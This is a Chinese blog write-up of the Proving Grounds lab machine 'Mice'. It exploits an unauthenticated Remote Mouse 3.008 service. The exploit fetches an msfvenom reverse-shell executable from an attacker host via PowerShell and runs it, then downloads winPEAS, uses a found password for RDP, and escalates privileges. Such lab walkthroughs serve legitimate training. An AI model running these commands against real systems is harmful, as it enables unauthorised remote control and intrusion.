PG靶机复现 Mice

端口扫描

nmap -sC -sV -Pn -n -T4 -p- 192.168.229.199
在这里插入图片描述

枚举和利用

google一下发现可能存在
Remote Mouse 3.008 - Failure to Authenticate

RemoteMouse 应用程序是一个可以从手机或平板电脑远程控制计算机的程序。这个漏洞允许连接到远程 RemoteMouse 服务,以虚拟方式按下任意键并在机器上执行代码。
exp:

https://github.com/p0dalirius/RemoteMouse-3.008-Exploit/tree/master

生成恶意exe文件

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=80 -f exe > reshell.exe

在这里插入图片描述

python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "powershell -c \"iwr http://192.168.45.227/reshell.exe -o C:\Windows\Temp\reshell.exe\""

在这里插入图片描述

python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.229.199 --cmd "C:\Windows\Temp\reshell.exe"

在这里插入图片描述

提取

查找发现local文件

powershell Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.kdbx,*.lnk -File -Recurse -ErrorAction SilentlyContinue

在这里插入图片描述

powershell iwr http://192.168.45.227/winPEASx64.exe -o winPEASx64.exe

在这里插入图片描述
发现
在这里插入图片描述
但是我们需要rdp进入,该shell用户是rdp组
请添加图片描述
在这里插入图片描述
查看密码文件,发现密码
在这里插入图片描述
得到密码,现在可以rdp进入系统

在这里插入图片描述
查看提权步骤:
在这里插入图片描述
在右下角打卡
在这里插入图片描述
选择Change
在这里插入图片描述
在这里插入图片描述
然后回车
在这里插入图片描述
成功提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值